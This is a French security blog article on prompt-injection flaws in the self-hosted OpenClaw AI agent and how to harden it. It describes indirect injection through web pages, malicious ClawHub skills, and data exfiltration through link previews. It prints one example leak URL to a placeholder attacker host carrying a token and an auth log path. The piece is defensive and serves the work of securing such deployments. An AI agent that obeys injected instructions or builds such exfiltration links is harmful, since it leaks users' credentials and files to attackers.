OpenClaw : comment les failles d’injection de prompts menacent vos données et comment s’en prémunir
Théophane Villedieu
Selon le rapport ENISA 2025, 42 % des incidents liés aux agents autonomes sont déclenchés par des injections de prompts malveillantes. Cette statistique surprenante montre que la sécurité des IA n’est plus une option, mais une nécessité cruciale pour toute organisation.
Dans cet article, nous vous présentons les failles découvertes dans OpenClaw, l’agent IA open-source auto-hébergé, ainsi que les risques d’exfiltration de données qui en découlent. Vous apprendrez comment les acteurs malveillants exploitent les configurations par défaut faibles, quelles sont les conséquences concrètes pour les secteurs critiques, et surtout quelles mesures pratiques vous pouvez appliquer dès aujourd’hui pour sécuriser votre déploiement.
Comprendre les vecteurs d’injection de prompts dans OpenClaw
Qu’est-ce qu’une injection de prompts ?
L’injection de prompts désigne l’insertion de commandes malveillantes dans le texte que l’agent IA analyse, afin de détourner son comportement. Dans le cas d’OpenClaw, le problème réside dans la capacité de l’agent à parcourir le Web, résumer des pages et exécuter des actions système en fonction des instructions qu’il reçoit.
« AI agents are increasingly able to browse the web, retrieve information, and take actions on a user’s behalf. Those capabilities are useful, but they also create new ways for attackers to try to manipulate the system », OpenAI, blog 2026.
Scénario d’injection indirecte (IDPI / XPIA)
L’injection indirecte, ou cross-domain prompt injection (XPIA), ne cible pas directement le modèle de langage, mais exploite une fonctionnalité bénigne - par exemple la génération de résumés de pages web - pour exécuter des instructions non souhaitées. Un acteur malveillant peut ainsi placer un texte manipulé dans une page publique; lorsqu’OpenClaw lit cette page, il exécute les ordres cachés, comme la lecture de fichiers sensibles ou la création d’un URL de fuite.
Premier indicateur de compromission
- Augmentation inhabituelle du trafic réseau sortant vers des domaines inconnus.
- Génération de logs contenant des traces de prompt inhabituelles.
- Modifications inattendues du système de fichiers dans les répertoires de compétences (skills).
Risques d’exfiltration de données (technique zombie-zip) via les aperçus de liens
Le mécanisme des aperçus de liens
OpenClaw peut générer des réponses contenant des URL. Dans des messageries comme Telegram ou Discord, ces URL sont automatiquement transformées en aperçus (link previews). Si l’URL est construite par l’agent avec des paramètres contenant des informations sensibles, le simple rendu de l’aperçu suffit à transmettre les données à l’adresse de l’attaquant.
« This means that in agentic systems with link previews, data exfiltration can occur immediately upon the AI agent responding to the user, without the user needing to click the malicious link », PromptArmor, étude 2026.
Exemple concret : fuite de credentials
Un utilisateur demande à OpenClaw de « résumer les logs du serveur ». L’agent, compromis, répond avec un texte incluant un lien du type https://malicious.example.com/exfil?token=ABCD1234&log=ERROR+%C2%BB+%2Fvar%2Flog%2Fauth.log. Le client de messagerie crée un aperçu, le navigateur du serveur envoie une requête GET, et les logs sont instantanément livrés à l’attaquant.
Tableau comparatif des configurations par défaut vs sécurisées
| Aspect | Configuration par défaut | Configuration sécurisée |
|---|---|---|
| Port de gestion | Ouvert sur 0.0.0.0:8080 | Restreint à localhost ou via VPN |
| Authentification | Aucun mot de passe (admin) | Authentification forte (MFA) |
| Stockage des credentials | Texte en clair | Secrets chiffrés via Vault |
| Mises à jour automatiques | Activées (sources non vérifiées) | Désactivées, mises à jour manuelles après validation |
| Accès aux compétences externes | Autorisé sans vérification | Whitelist de dépôts certifiés |
Vulnérabilités supplémentaires identifiées par la CNCERT
Suppression involontaire de données critiques
En raison d’une interprétation littérale des instructions, OpenClaw peut supprimer des fichiers essentiels si l’utilisateur formule une requête ambiguë. Par exemple, la commande « nettoyer les logs » peut entraîner la suppression de toute la base de données si les filtres ne sont pas correctement appliqués.
Compétences malveillantes provenant de ClawHub
Des acteurs peuvent publier des skills (modules) sur le dépôt public ClawHub contenant du code malveillant. Une fois installé, le skill peut exécuter des commandes système, installer des logiciels de type rat ou même déployer des payloads comme Atomic ou Vidar Stealer.
Exploitation de vulnérabilités récentes du code source
La CNCERT a signalé trois CVE critiques (CVE-2025-4211, CVE-2025-4212, CVE-2025-4213) affectant la gestion des entrées réseau, la désérialisation JSON et le traitement des fichiers de configuration. Selon l’ANSSI 2024, 68 % des entités publiques ne patchent pas ces failles dans les 30 jours, exposant ainsi leurs infrastructures à des compromissions rapides.
Bonnes pratiques de sécurisation d’OpenClaw
Isolation et conteneurisation
- Déployer OpenClaw dans un container Docker avec des limites de ressources (CPU, mémoire) et un réseau en mode bridge isolé.
- Utiliser un pare-feu pour bloquer tout accès extérieur au port de gestion (ex. 8080).
- Activer le mode read-only sur le système de fichiers applicatif, sauf pour les dossiers de logs dédiés.
Gestion des credentials
- Stocker les clés API et mots de passe dans un gestionnaire de secrets (HashiCorp Vault, Azure Key Vault).
- Chiffrer les fichiers de configuration avec AES-256 avant de les monter dans le container.
- Interdire la persistance de tokens en clair dans les logs.
Sécurisation des compétences (skills)
- Vérifier la signature des skills téléchargés depuis ClawHub.
- Limiter les compétences aux seules fonctions indispensables.
- Auditer le code avec des outils SAST avant l’installation.
Mise à jour et durcissement du logiciel
- Désactiver les mises à jour automatiques provenant de sources non vérifiées.
- Appliquer les correctifs dès leur publication, en suivant les bulletins de sécurité de la CNCERT.
- Configurer le mode de journalisation verbeux pour détecter les comportements anormaux.
Mise en œuvre - étapes actionnables
- Audit initial : utilisez un scanner de vulnérabilités (ex. OpenVAS) pour identifier les ports ouverts et les dépendances non patchées.
- Déploiement conteneurisé :
docker run -d \ --name openclaw \ --restart unless-stopped \ -p 127.0.0.1:8080:8080 \ -v /srv/openclaw/config:/app/config:ro \ -v /srv/openclaw/secrets:/app/secrets:ro \ openclaw:latest - Configuration sécurisée : éditez
config.yamlpour activer l’authentification MFA et restreindre les endpoints API. - Hardening des compétences : créez une whitelist
allowed_skills.jsoncontenant uniquement les ID certifiés. - Surveillance continue : déployez un SIEM (ex. Splunk ou ELK) pour collecter les logs d’accès et les alertes d’anomalies.
- Tests de pénétration régulier : simulez des injections de prompts en injectant des scripts malicieux dans des pages publiques et observez le comportement d’OpenClaw.
Conclusion - prochaine action avec avis tranché
Les failles d’OpenClaw illustrent clairement que les agents IA autonomes, même open-source, peuvent devenir des vecteurs d’attaque redoutables lorsqu’ils sont déployés sans mesures de sécurité adéquates. En 2026, la menace d’injection de prompts et d’exfiltration de données est déjà bien documentée ; la négliger serait une erreur stratégique.
Notre recommandation : bloquez immédiatement l’exposition du port de gestion au réseau public, migrez vers une architecture conteneurisée et appliquez les bonnes pratiques de gestion des credentials et des compétences. En suivant les étapes détaillées ci-dessus, vous réduirez de façon mesurable le risque d’intrusion et protégerez vos actifs critiques contre les acteurs malveillants.
Protégez-vous dès aujourd’hui (guide freelance cybersécurité) : l’IA ne dort jamais, votre défense non plus.